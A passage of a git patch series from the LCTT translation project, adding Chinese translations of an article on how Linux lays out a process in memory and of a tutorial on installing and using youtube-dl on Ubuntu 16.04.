-You can examine binary images using the [nm][23] and [objdump][24] commands to display symbols, their addresses, segments, and so on. Finally, the virtual address layout described above is the “flexible” layout in Linux, which has been the default for a few years. It assumes that we have a value for RLIMIT_STACK. When that’s not the case, Linux reverts back to the “classic” layout shown below:
-
-![Classic Process Address Space Layout In Linux](http://static.duartes.org/img/blogPosts/linuxClassicAddressSpaceLayout.png)
-
-That’s it for virtual address space layout. The next post discusses how the kernel keeps track of these memory areas. Coming up we’ll look at memory mapping, how file reading and writing ties into all this and what memory usage figures mean.
-
---------------------------------------------------------------------------------
-
-via: http://duartes.org/gustavo/blog/post/anatomy-of-a-program-in-memory/
-
-作者:[gustavo ][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://duartes.org/gustavo/blog/about/
-[1]:http://duartes.org/gustavo/blog/post/cpu-rings-privilege-and-protection
-[2]:http://duartes.org/gustavo/blog/post/memory-translation-and-segmentation
-[3]:http://lxr.linux.no/linux+v2.6.28.1/fs/binfmt_elf.c#L542
-[4]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/mm/mmap.c#L84
-[5]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/kernel/process_32.c#L729
-[6]:http://www.stanford.edu/~blp/papers/asrandom.pdf
-[7]:http://en.wikipedia.org/wiki/Lifo
-[8]:http://duartes.org/gustavo/blog/post/intel-cpu-caches
-[9]:http://lxr.linux.no/linux+v2.6.28/mm/mmap.c#L1716
-[10]:http://lxr.linux.no/linux+v2.6.28/mm/mmap.c#L1544
-[11]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/mm/fault.c#L692
-[12]:http://www.kernel.org/doc/man-pages/online/pages/man2/mmap.2.html
-[13]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/kernel/sys_i386_32.c#L27
-[14]:http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx
-[15]:http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx
-[16]:http://www.kernel.org/doc/man-pages/online/pages/man3/malloc.3.html
-[17]:http://www.kernel.org/doc/man-pages/online/pages/man3/undocumented.3.html
-[18]:http://www.kernel.org/doc/man-pages/online/pages/man3/malloc.3.html
-[19]:http://www.kernel.org/doc/man-pages/online/pages/man2/brk.2.html
-[20]:http://lxr.linux.no/linux+v2.6.28.1/mm/mmap.c#L248
-[21]:http://g.oswego.edu/dl/html/malloc.html
-[22]:http://rtportal.upv.es/rtmalloc/
-[23]:http://manpages.ubuntu.com/manpages/intrepid/en/man1/nm.1.html
-[24]:http://manpages.ubuntu.com/manpages/intrepid/en/man1/objdump.1.html
diff --git a/translated/tech/20090127 Anatomy of a Program in Memory.md b/translated/tech/20090127 Anatomy of a Program in Memory.md
new file mode 100644
index 0000000000..aa478535f4
--- /dev/null
+++ b/translated/tech/20090127 Anatomy of a Program in Memory.md
@@ -0,0 +1,84 @@
+剖析内存中的程序
+============================================================
+
+内存管理是操作系统的核心任务;它对程序员和系统管理员来说也至关重要。在接下来的几篇文章中,我将从实践角度出发讲解内存管理,并深入它的内部结构。虽然这些概念是通用的,但示例大多取自 32 位 x86 架构上的 Linux 和 Windows。这第一篇文章描述程序在内存中是如何布局的。
+
+多任务操作系统中的每个进程都运行在它自己的内存“沙箱”中。这个沙箱就是虚拟地址空间,在 32 位模式下它总是一块 4GB 大小的内存地址区域。这些虚拟地址通过页表映射到物理内存,页表由操作系统内核维护,并由处理器查询。每个进程都有它自己的一组页表,但这里有一个问题:一旦启用了虚拟地址,它们就会作用于这台机器上运行的 _所有软件_,_包括内核本身_。因此,一部分虚拟地址空间必须保留给内核使用:
+
+![Kernel/User Memory Split](http://static.duartes.org/img/blogPosts/kernelUserMemorySplit.png)
+
+但是,这并不是说内核使用了那么多物理内存,而只是说内核有这部分地址空间可用,可以把它映射到任意它想映射的物理内存上。内核空间在页表中被标记为 [特权代码][1](ring 2 或更低)独占,因此如果用户态程序尝试访问它,就会触发页面故障(page fault)。在 Linux 中,内核空间是始终存在的,并且在所有进程中都映射到相同的物理内存。内核代码和数据始终是可寻址的,随时准备处理中断或系统调用。相比之下,地址空间中用户态部分的映射则会在每次进程切换时发生变化:
+
+![Process Switch Effects on Virtual Memory](http://static.duartes.org/img/blogPosts/virtualMemoryInProcessSwitch.png)
+
+蓝色区域代表已映射到物理内存的虚拟地址,白色区域则是尚未映射的部分。在上面的示例中,Firefox 因其传说级的“吃内存”而使用了大量的虚拟地址空间。地址空间中那些不同的条带对应着不同的内存段,比如堆、栈等等。请记住,这些段只不过是一段内存地址范围,与 [Intel 风格的分段][2] _没有任何关系_。下面是 Linux 进程中标准的段布局:
+
+![Flexible Process Address Space Layout In Linux](http://static.duartes.org/img/blogPosts/linuxFlexibleAddressSpaceLayout.png)
+
+在计算机世界还一片快乐、安全、温馨的年代,机器上几乎每个进程的上述各段起始虚拟地址都是完全相同的,这使得远程利用安全漏洞变得很容易。漏洞利用经常需要引用绝对内存地址:栈上的某个地址、某个库函数的地址,等等。远程攻击者必须盲目地选择这些地址,并指望所有机器的地址空间都一样。一旦真是这样,人们就会被攻陷。因此,地址空间随机化开始流行起来。Linux 通过给 [栈][3]、[内存映射段][4] 和 [堆][5] 的起始地址加上随机偏移量来实现随机化。不幸的是,32 位地址空间非常拥挤,给随机化留下的空间不多,因此 [削弱了这种手段的效果][6]。
+
+进程地址空间中最高的段是栈,大多数编程语言用它来存储局部变量和函数参数。调用一个方法或函数会向栈中压入一个新的栈帧,函数返回时这个栈帧被销毁。这种简单的设计之所以可行,是因为数据严格遵循 [后进先出(LIFO)][7] 的次序,这意味着不需要复杂的数据结构来跟踪栈的内容,一个指向栈顶的简单指针就足够了。因此压栈和出栈都非常快,而且是确定性的。此外,栈区的反复重用往往能让活跃的栈内存保持在 [CPU 缓存][8] 中,从而加快访问速度。进程中的每个线程都有自己的栈。
+
+如果向栈中压入的数据超过了它能容纳的大小,就会耗尽映射给栈的区域,从而触发一个页面故障。在 Linux 中,这个故障由 [expand_stack()][9] 处理,它会调用 [acct_stack_growth()][10] 来检查此次栈增长是否合适。如果栈的大小低于 RLIMIT_STACK 的值(通常为 8MB),那么栈就会正常增长,程序继续愉快地运行,对刚才发生的一切毫无察觉。这就是栈大小按需调整的常规机制。但是,如果已经达到了栈大小的上限,就会发生栈溢出,程序会收到一个段错误(Segmentation Fault)。另外,映射的栈区域会按需扩展,但当栈变小时它并不会随之收缩。就像联邦预算一样,它只会扩张。
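+
+一个简单的验证方法(以下命令只是示意):可以用 `ulimit` 查看或临时调整当前 shell 的 RLIMIT_STACK:
+```
+ulimit -s          # 以 KB 为单位显示栈大小上限,常见默认值为 8192(即 8MB)
+ulimit -s 16384    # 临时把上限调到 16MB,只对当前 shell 及其子进程生效
+```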
+
+动态栈增长是访问未映射内存区域(上图中的白色部分)可能被允许的 [唯一情况][11]。除此之外,任何对未映射内存的访问都会触发页面故障,进而导致段错误。另外,一些已映射的区域是只读的,尝试写入这些区域同样会导致段错误。
+
+栈的下面是内存映射段。在这里,内核把文件内容直接映射到内存。任何应用程序都可以通过 Linux 的 [mmap()][12] 系统调用([实现][13])或 Windows 的 [CreateFileMapping()][14] / [MapViewOfFile()][15] 来请求这样的映射。内存映射是一种方便且高性能的文件 I/O 方式,因此它被用来加载动态库。也可以创建不对应任何文件的匿名内存映射,用来存放程序数据。在 Linux 中,如果你通过 [malloc()][16] 请求一大块内存,C 库会创建这样一个匿名映射而不是使用堆内存。这里的“大”指的是超过 MMAP_THRESHOLD 设置的字节数,默认为 128 kB,可以通过 [mallopt()][17] 调整。
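+
+想粗略地观察这一行为,可以用 strace 跟踪分配时的系统调用(以下只是一个示意,假设系统中装有 strace 和 python3;大块分配通常会走匿名 mmap,小块分配则通过 brk 扩展堆):
+```
+strace -e trace=brk,mmap python3 -c "b = bytearray(64 * 1024 * 1024)" 2>&1 | tail -n 20
+```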
+
+说到堆,它是我们深入地址空间时遇到的下一个段。和栈一样,堆提供运行时的内存分配;与栈不同的是,它存放的数据要比分配它的函数活得更久。大多数编程语言都为程序提供堆管理,因此满足内存请求是语言运行时和内核共同完成的事情。在 C 中,堆分配的接口是 [malloc()][18] 及其相关函数,而在像 C# 这样带垃圾回收的语言中,这个接口是 new 关键字。
+
+如果堆中有足够的空间满足内存请求,那么语言运行时就可以自行处理,无需内核参与。否则就要通过 [brk()][19] 系统调用([实现][20])来扩大堆,为请求的内存块腾出空间。堆管理是很 [复杂的][21],面对程序混乱的分配模式,它需要精巧的算法在速度和内存使用效率之间取得平衡。服务一次堆请求所需的时间可能差别很大。实时系统使用 [专用分配器][22] 来解决这个问题。堆也会产生 _碎片_,如下图所示:
+
+![Fragmented Heap](http://static.duartes.org/img/blogPosts/fragmentedHeap.png)
+
+最后,我们来到了内存的低位段:BSS、数据段以及程序文本段。在 C 中,BSS 和数据段都用来保存静态(全局)变量的内容。区别在于,BSS 保存的是 _未初始化的_ 静态变量的内容,也就是程序员没有在源代码中设置初值的那些变量。BSS 内存区域是 _匿名_ 的:它不映射任何文件。如果你写了 static int cntActiveUsers 这样的语句,cntActiveUsers 的内容就保存在 BSS 中。
+
+数据段则保存在源代码中 _已初始化_ 的静态变量的内容。这块内存区域不是匿名的,它映射了程序二进制镜像中包含这些初始值的那一部分。因此,如果你写了 static int cntWorkerBees = 10,那么 cntWorkerBees 的内容就保存在数据段中,初始值为 10。虽然数据段映射了一个文件,但它是私有内存映射,这意味着对这块内存的修改不会反映到底层文件上。必须如此,否则对全局变量的赋值就会改写你磁盘上的二进制镜像,这太不可思议了!
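+
+下面是一个小示意(假设装有 gcc):用 `size` 和 `nm` 观察未初始化与已初始化的静态变量分别落在哪个段:
+```
+cat > vars.c <<'EOF'
+static int cntActiveUsers;        /* 未初始化:内容位于 BSS 段 */
+static int cntWorkerBees = 10;    /* 已初始化:内容位于数据段 */
+int main(void) { return cntActiveUsers + cntWorkerBees; }
+EOF
+gcc -o vars vars.c
+size vars            # 打印 text、data、bss 各段的大小
+nm vars | grep cnt   # b/B 表示符号在 BSS 段,d/D 表示在数据段
+```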
+
+图中数据段的例子要更复杂一些,因为它用到了指针。在这种情况下,指针 gonzo 的 _内容_(一个 4 字节的内存地址)保存在数据段中;而它指向的实际字符串并不在数据段里,而是在文本段中。文本段是只读的,除了保存你的全部代码之外,还保存字符串字面量这类零碎内容。文本段同样把你的二进制文件映射到内存中,但对这块区域的写入会让你的程序收到段错误。这有助于防止指针错误,虽然不如一开始就避免使用 C 来得有效。下图展示了这些段以及示例变量:
+
+![ELF Binary Image Mapped Into Memory](http://static.duartes.org/img/blogPosts/mappingBinaryImage.png)
+
+你可以通过读取 /proc/pid_of_process/maps 文件来查看 Linux 进程中的内存区域。请记住,一个段可能包含许多区域。例如,每个内存映射的文件通常在 mmap 段中都有自己的区域,而动态库还有类似 BSS 和数据段的额外区域。下一篇文章会解释“区域(area)”的确切含义。另外,有时人们说的“数据段(data segment)”指的是数据段 + BSS + 堆的总和。
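+
+例如(只是一个示意,1234 需要替换成实际的进程号):
+```
+cat /proc/self/maps | head -n 20          # 查看 cat 进程自身的内存区域
+grep -E 'heap|stack' /proc/1234/maps      # 只看某个进程的堆和栈区域
+```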
+
+你可以使用 [nm][23] 和 [objdump][24] 命令来检查二进制镜像,显示其中的符号、地址、段等信息。最后要说明的是,上面描述的虚拟地址布局是 Linux 中的“弹性”布局,这也是近几年来的默认布局。它假设 RLIMIT_STACK 有一个确定的值;如果没有,Linux 则会退回到下图所示的“经典”布局:
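+
+一个快速上手的示意(以系统自带的 /bin/ls 为例;若二进制被 strip 过,nm 可能没有输出):
+```
+objdump -h /bin/ls | head -n 20   # 列出各个节(section)的名称、大小和地址
+nm /bin/ls 2>/dev/null | head     # 列出符号及其所在段
+```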
+
+![Classic Process Address Space Layout In Linux](http://static.duartes.org/img/blogPosts/linuxClassicAddressSpaceLayout.png)
+
+以上就是虚拟地址空间布局。下一篇文章将讨论内核如何跟踪这些内存区域;之后我们还会看看内存映射、文件读写与这一切的关系,以及内存使用数据的含义。
+
+--------------------------------------------------------------------------------
+
+via: http://duartes.org/gustavo/blog/post/anatomy-of-a-program-in-memory/
+
+作者:[gustavo ][a]
+译者:[qhwdw](https://github.com/qhwdw)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://duartes.org/gustavo/blog/about/
+[1]:http://duartes.org/gustavo/blog/post/cpu-rings-privilege-and-protection
+[2]:http://duartes.org/gustavo/blog/post/memory-translation-and-segmentation
+[3]:http://lxr.linux.no/linux+v2.6.28.1/fs/binfmt_elf.c#L542
+[4]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/mm/mmap.c#L84
+[5]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/kernel/process_32.c#L729
+[6]:http://www.stanford.edu/~blp/papers/asrandom.pdf
+[7]:http://en.wikipedia.org/wiki/Lifo
+[8]:http://duartes.org/gustavo/blog/post/intel-cpu-caches
+[9]:http://lxr.linux.no/linux+v2.6.28/mm/mmap.c#L1716
+[10]:http://lxr.linux.no/linux+v2.6.28/mm/mmap.c#L1544
+[11]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/mm/fault.c#L692
+[12]:http://www.kernel.org/doc/man-pages/online/pages/man2/mmap.2.html
+[13]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/kernel/sys_i386_32.c#L27
+[14]:http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx
+[15]:http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx
+[16]:http://www.kernel.org/doc/man-pages/online/pages/man3/malloc.3.html
+[17]:http://www.kernel.org/doc/man-pages/online/pages/man3/undocumented.3.html
+[18]:http://www.kernel.org/doc/man-pages/online/pages/man3/malloc.3.html
+[19]:http://www.kernel.org/doc/man-pages/online/pages/man2/brk.2.html
+[20]:http://lxr.linux.no/linux+v2.6.28.1/mm/mmap.c#L248
+[21]:http://g.oswego.edu/dl/html/malloc.html
+[22]:http://rtportal.upv.es/rtmalloc/
+[23]:http://manpages.ubuntu.com/manpages/intrepid/en/man1/nm.1.html
+[24]:http://manpages.ubuntu.com/manpages/intrepid/en/man1/objdump.1.html
From b8f5b0511157a786086bb61cbce7635e60771b2a Mon Sep 17 00:00:00 2001
From: qhwdw
Date: Thu, 11 Jan 2018 15:00:49 +0800
Subject: [PATCH 237/371] Translating by qhwdw
---
sources/tech/20090203 How the Kernel Manages Your Memory.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20090203 How the Kernel Manages Your Memory.md b/sources/tech/20090203 How the Kernel Manages Your Memory.md
index 9eb30b0b23..2a95c74ecb 100644
--- a/sources/tech/20090203 How the Kernel Manages Your Memory.md
+++ b/sources/tech/20090203 How the Kernel Manages Your Memory.md
@@ -1,3 +1,4 @@
+Translating by qhwdw
How the Kernel Manages Your Memory
============================================================
From fde2744a890ec106011d8e54a407eaabea44009f Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 15:53:31 +0800
Subject: [PATCH 238/371] translate done: 20171012 Install and Use YouTube-DL
on Ubuntu 16.04.md
---
...tall and Use YouTube-DL on Ubuntu 16.04.md | 155 ---------------
...tall and Use YouTube-DL on Ubuntu 16.04.md | 176 ++++++++++++++++++
2 files changed, 176 insertions(+), 155 deletions(-)
delete mode 100644 sources/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md
create mode 100644 translated/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md
diff --git a/sources/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md b/sources/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md
deleted file mode 100644
index dc0391768e..0000000000
--- a/sources/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md
+++ /dev/null
@@ -1,155 +0,0 @@
-translating by lujun9972
-Install and Use YouTube-DL on Ubuntu 16.04
-======
-
-Youtube-dl is a free and open source command line video download tools that can be used to download video from Youtube and other websites like, Facebook, Dailymotion, Google Video, Yahoo and much more. It is based on pygtk and requires Python to run this software. It supports many operating system including, Windows, Mac and Unix. Youtube-dl supports resuming interrupted downloads, channel or playlist download, add custom title, proxy and much more.
-
-In this tutorial, we will learn how to install and use Youtube-dl and Youtube-dlg on Ubuntu 16.04. We will also learn how to download Youtube video in different quality and formats.
-
-### Requirements
-
- * A server running Ubuntu 16.04.
- * A non-root user with sudo privileges setup on your server.
-
-
-
-Let's start by updating your system to the latest version with the following command:
-
-```
-sudo apt-get update -y
-sudo apt-get upgrade -y
-```
-
-After updating, restart the system to apply all these changes.
-
-### Install Youtube-dl
-
-By default, Youtube-dl is not available in the Ubuntu-16.04 repository. So you will need to download it from their official website. You can download it with the curl command:
-
-First, install curl with the following command:
-
-sudo apt-get install curl -y
-
-Next, download the youtube-dl binary:
-
-curl -L https://yt-dl.org/latest/youtube-dl -o /usr/bin/youtube-dl
-
-Next, change the permission of the youtube-dl binary package with the following command:
-
-sudo chmod 755 /usr/bin/youtube-dl
-
-Once youtube-dl is installed, you can proceed to the next step.
-
-### Use Youtube-dl
-
-You can list all the available options with youtube-dl, run the following command:
-
-youtube-dl --h
-
-Youtube-dl supports many Video formats such as Mp4, WebM, 3gp, and FLV. You can list all the available formats for specific Video with the following command:
-
-youtube-dl -F https://www.youtube.com/watch?v=j_JgXJ-apXs
-
-You should see the all the available formats for this video as below:
-```
-[info] Available formats for j_JgXJ-apXs:
-format code extension resolution note
-139 m4a audio only DASH audio 56k , m4a_dash container, [[email protected]][1] 48k (22050Hz), 756.44KiB
-249 webm audio only DASH audio 56k , opus @ 50k, 724.28KiB
-250 webm audio only DASH audio 69k , opus @ 70k, 902.75KiB
-171 webm audio only DASH audio 110k , [[email protected]][1], 1.32MiB
-251 webm audio only DASH audio 122k , opus @160k, 1.57MiB
-140 m4a audio only DASH audio 146k , m4a_dash container, [[email protected]][1] (44100Hz), 1.97MiB
-278 webm 256x144 144p 97k , webm container, vp9, 24fps, video only, 1.33MiB
-160 mp4 256x144 DASH video 102k , avc1.4d400c, 24fps, video only, 731.53KiB
-133 mp4 426x240 DASH video 174k , avc1.4d4015, 24fps, video only, 1.36MiB
-242 webm 426x240 240p 221k , vp9, 24fps, video only, 1.74MiB
-134 mp4 640x360 DASH video 369k , avc1.4d401e, 24fps, video only, 2.90MiB
-243 webm 640x360 360p 500k , vp9, 24fps, video only, 4.15MiB
-135 mp4 854x480 DASH video 746k , avc1.4d401e, 24fps, video only, 6.11MiB
-244 webm 854x480 480p 844k , vp9, 24fps, video only, 7.27MiB
-247 webm 1280x720 720p 1155k , vp9, 24fps, video only, 9.21MiB
-136 mp4 1280x720 DASH video 1300k , avc1.4d401f, 24fps, video only, 9.66MiB
-248 webm 1920x1080 1080p 1732k , vp9, 24fps, video only, 14.24MiB
-137 mp4 1920x1080 DASH video 2217k , avc1.640028, 24fps, video only, 15.28MiB
-17 3gp 176x144 small , mp4v.20.3, [[email protected]][1] 24k
-36 3gp 320x180 small , mp4v.20.3, mp4a.40.2
-43 webm 640x360 medium , vp8.0, [[email protected]][1]
-18 mp4 640x360 medium , avc1.42001E, [[email protected]][1] 96k
-22 mp4 1280x720 hd720 , avc1.64001F, [[email protected]][1] (best)
-
-```
-
-Next, choose any format you want to download with the flag -f as shown below:
-
-youtube-dl -f 18 https://www.youtube.com/watch?v=j_JgXJ-apXs
-
-This command will download the Video in mp4 format at 640x360 resolution:
-```
-[youtube] j_JgXJ-apXs: Downloading webpage
-[youtube] j_JgXJ-apXs: Downloading video info webpage
-[youtube] j_JgXJ-apXs: Extracting video information
-[youtube] j_JgXJ-apXs: Downloading MPD manifest
-[download] Destination: B.A. PASS 2 Trailer no 2 _ Filmybox-j_JgXJ-apXs.mp4
-[download] 100% of 6.90MiB in 00:47
-
-```
-
-If you want to download Youtube video in mp3 audio format, then it is also possible with the following command:
-
-youtube-dl https://www.youtube.com/watch?v=j_JgXJ-apXs -x --audio-format mp3
-
-You can download all the videos of specific channels by appending the channel's URL as shown below:
-
-youtube-dl -citw https://www.youtube.com/channel/UCatfiM69M9ZnNhOzy0jZ41A
-
-If your network is behind the proxy, then you can download the video using --proxy flag as shown below:
-
-youtube-dl --proxy http://proxy-ip:port https://www.youtube.com/watch?v=j_JgXJ-apXs
-
-To download the list of many Youtube videos with the single command, then first save all the Youtube video URL in a file called youtube-list.txt and run the following command to download all the videos:
-
-youtube-dl -a youtube-list.txt
-
-### Install Youtube-dl GUI
-
-If you are looking for a graphical tool for youtube-dl, then youtube-dlg is the best choice for you. youtube-dlg is a free and open source tool for youtube-dl written in wxPython.
-
-By default, this tool is not available in Ubuntu 16.04 repository. So you will need to add PPA for that.
-
-sudo add-apt-repository ppa:nilarimogard/webupd8
-
-Next, update your package repository and install youtube-dlg with the following command:
-
-sudo apt-get update -y
-sudo apt-get install youtube-dlg -y
-
-Once Youtube-dl is installed, you can launch it from Unity Dash as shown below:
-
-[![][2]][3]
-
-[![][4]][5]
-
-You can now easily download any Youtube video as you wish just paste their URL in the URL field shown in the above image. Youtube-dlg is very useful for those people who don't know command line.
-
-### Conclusion
-
-Congratulations! You have successfully installed youtube-dl and youtube-dlg on Ubuntu 16.04 server. You can now easily download any videos from Youtube and any youtube-dl supported sites in any formats and any size.
-
-
---------------------------------------------------------------------------------
-
-via: https://www.howtoforge.com/tutorial/install-and-use-youtube-dl-on-ubuntu-1604/
-
-作者:[Hitesh Jethva][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.howtoforge.com
-[1]:/cdn-cgi/l/email-protection
-[2]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/Screenshot-of-youtube-dl-dash.png
-[3]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/big/Screenshot-of-youtube-dl-dash.png
-[4]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/Screenshot-of-youtube-dl-dashboard.png
-[5]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/big/Screenshot-of-youtube-dl-dashboard.png
diff --git a/translated/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md b/translated/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md
new file mode 100644
index 0000000000..a40a1194d4
--- /dev/null
+++ b/translated/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md
@@ -0,0 +1,176 @@
+在 Ubuntu 16.04 上安装并使用 YouTube-DL
+======
+
+Youtube-dl 是一个自由开源的命令行视频下载工具,可以用来从 Youtube 以及 Facebook、Dailymotion、Google Video、Yahoo 等类似网站上下载视频。它基于 pygtk 构建,需要 Python 才能运行。它支持包括 Windows、Mac 以及 Unix 在内的多种操作系统。Youtube-dl 还支持断点续传、下载整个频道或播放列表中的视频、添加自定义标题、使用代理等许多功能。
+
+本文中,我们将学习如何在 Ubuntu 16.04 上安装并使用 Youtube-dl 和 Youtube-dlg,还会学习如何以不同的质量和格式下载 Youtube 视频。
+
+### 前置需求
+
+ * 一台运行 Ubuntu 16.04 的服务器。
+ * 非 root 用户但拥有 sudo 特权。
+
+让我们首先用下面命令升级系统到最新版:
+
+```
+sudo apt-get update -y
+sudo apt-get upgrade -y
+```
+
+然后重启系统应用这些变更。
+
+### 安装 Youtube-dl
+
+默认情况下,Youtube-dl 并不在 Ubuntu-16.04 仓库中。你需要从官网上来下载它。使用 curl 命令可以进行下载:
+
+首先,使用下面命令安装 curl:
+
+```
+sudo apt-get install curl -y
+```
+
+然后,下载 youtube-dl 的二进制包:
+
+```
+curl -L https://yt-dl.org/latest/youtube-dl -o /usr/bin/youtube-dl
+```
+
+接着,用下面命令更改 youtube-dl 二进制包的权限:
+
+```
+sudo chmod 755 /usr/bin/youtube-dl
+```
+
+这样 youtube-dl 就算是安装好了,现在可以进行下一步了。
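+
+如果想确认安装是否成功,可以查看一下版本号(输出会随安装时间不同而变化):
+```
+youtube-dl --version
+```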
+
+### 使用 Youtube-dl
+
+运行下面命令会列出 youtube-dl 的所有可选项:
+
+```
+youtube-dl --help
+```
+
+Youtube-dl 支持多种视频格式,像 Mp4,WebM,3gp,以及 FLV 都支持。你可以使用下面命令列出指定视频所支持的所有格式:
+
+```
+youtube-dl -F https://www.youtube.com/watch?v=j_JgXJ-apXs
+```
+
+如下所示,你会看到该视频所有可能的格式:
+
+```
+[info] Available formats for j_JgXJ-apXs:
+format code extension resolution note
+139 m4a audio only DASH audio 56k , m4a_dash container, mp4a.40.5@ 48k (22050Hz), 756.44KiB
+249 webm audio only DASH audio 56k , opus @ 50k, 724.28KiB
+250 webm audio only DASH audio 69k , opus @ 70k, 902.75KiB
+171 webm audio only DASH audio 110k , vorbis@128k, 1.32MiB
+251 webm audio only DASH audio 122k , opus @160k, 1.57MiB
+140 m4a audio only DASH audio 146k , m4a_dash container, mp4a.40.2@128k (44100Hz), 1.97MiB
+278 webm 256x144 144p 97k , webm container, vp9, 24fps, video only, 1.33MiB
+160 mp4 256x144 DASH video 102k , avc1.4d400c, 24fps, video only, 731.53KiB
+133 mp4 426x240 DASH video 174k , avc1.4d4015, 24fps, video only, 1.36MiB
+242 webm 426x240 240p 221k , vp9, 24fps, video only, 1.74MiB
+134 mp4 640x360 DASH video 369k , avc1.4d401e, 24fps, video only, 2.90MiB
+243 webm 640x360 360p 500k , vp9, 24fps, video only, 4.15MiB
+135 mp4 854x480 DASH video 746k , avc1.4d401e, 24fps, video only, 6.11MiB
+244 webm 854x480 480p 844k , vp9, 24fps, video only, 7.27MiB
+247 webm 1280x720 720p 1155k , vp9, 24fps, video only, 9.21MiB
+136 mp4 1280x720 DASH video 1300k , avc1.4d401f, 24fps, video only, 9.66MiB
+248 webm 1920x1080 1080p 1732k , vp9, 24fps, video only, 14.24MiB
+137 mp4 1920x1080 DASH video 2217k , avc1.640028, 24fps, video only, 15.28MiB
+17 3gp 176x144 small , mp4v.20.3, mp4a.40.2@ 24k
+36 3gp 320x180 small , mp4v.20.3, mp4a.40.2
+43 webm 640x360 medium , vp8.0, vorbis@128k
+18 mp4 640x360 medium , avc1.42001E, mp4a.40.2@ 96k
+22 mp4 1280x720 hd720 , avc1.64001F, mp4a.40.2@192k (best)
+```
+
+然后使用 `-f` 指定你想要下载的格式,如下所示:
+
+```
+youtube-dl -f 18 https://www.youtube.com/watch?v=j_JgXJ-apXs
+```
+
+该命令会下载 640x360 分辨率的 mp4 格式的视频:
+```
+[youtube] j_JgXJ-apXs: Downloading webpage
+[youtube] j_JgXJ-apXs: Downloading video info webpage
+[youtube] j_JgXJ-apXs: Extracting video information
+[youtube] j_JgXJ-apXs: Downloading MPD manifest
+[download] Destination: B.A. PASS 2 Trailer no 2 _ Filmybox-j_JgXJ-apXs.mp4
+[download] 100% of 6.90MiB in 00:47
+
+```
+
+如果你想以 mp3 音频的格式下载 Youtube 视频,也可以做到:
+
+```
+youtube-dl https://www.youtube.com/watch?v=j_JgXJ-apXs -x --audio-format mp3
+```
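+
+youtube-dl 还支持用 `-o` 指定输出文件名模板,可以和格式选择组合使用(下面的模板只是一个常见示例):
+```
+youtube-dl -f best -o '%(title)s.%(ext)s' https://www.youtube.com/watch?v=j_JgXJ-apXs
+```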
+
+你也可以下载指定频道中的所有视频,只需要把频道的 URL 放到后面就行,如下所示:
+
+```
+youtube-dl -citw https://www.youtube.com/channel/UCatfiM69M9ZnNhOzy0jZ41A
+```
+
+若你的网络需要通过代理,那么可以使用 `--proxy` 来下载视频:
+
+```
+youtube-dl --proxy http://proxy-ip:port https://www.youtube.com/watch?v=j_JgXJ-apXs
+```
+
+若想一条命令下载多个 Youtube 视频,那么首先把所有要下载的 Youtube 视频 URL 存在一个文件中(假设这个文件叫 youtube-list.txt),然后运行下面命令:
+
+```
+youtube-dl -a youtube-list.txt
+```
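+
+例如(URL 仅为示例),可以这样生成列表文件再批量下载:
+```
+cat > youtube-list.txt <<'EOF'
+https://www.youtube.com/watch?v=j_JgXJ-apXs
+EOF
+youtube-dl -a youtube-list.txt
+```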
+
+### 安装 Youtube-dl GUI
+
+若你想要图形化的界面,那么 youtube-dlg 是你最好的选择。youtube-dlg 是一款由 wxPython 所写的免费而开源的 youtube-dl 界面。
+
+该工具默认也不在 Ubuntu 16.04 仓库中。因此你需要为它添加 PPA。
+
+```
+sudo add-apt-repository ppa:nilarimogard/webupd8
+```
+
+下一步,更新软件包仓库并安装 youtube-dlg:
+
+```
+sudo apt-get update -y
+sudo apt-get install youtube-dlg -y
+```
+
+安装好 Youtube-dlg 后,就能在 `Unity Dash` 中启动它了:
+
+[![][2]][3]
+
+[![][4]][5]
+
+现在你只需要将 URL 粘贴到上图中的 URL 域就能下载视频了。Youtube-dlg 对于那些不太懂命令行的人来说很有用。
+
+### 结语
+
+恭喜你!你已经成功地在 Ubuntu 16.04 服务器上安装好了 youtube-dl 和 youtube-dlg。你可以很方便地从 Youtube 及任何 youtube-dl 支持的网站上以任何格式和任何大小下载视频了。
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/tutorial/install-and-use-youtube-dl-on-ubuntu-1604/
+
+作者:[Hitesh Jethva][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
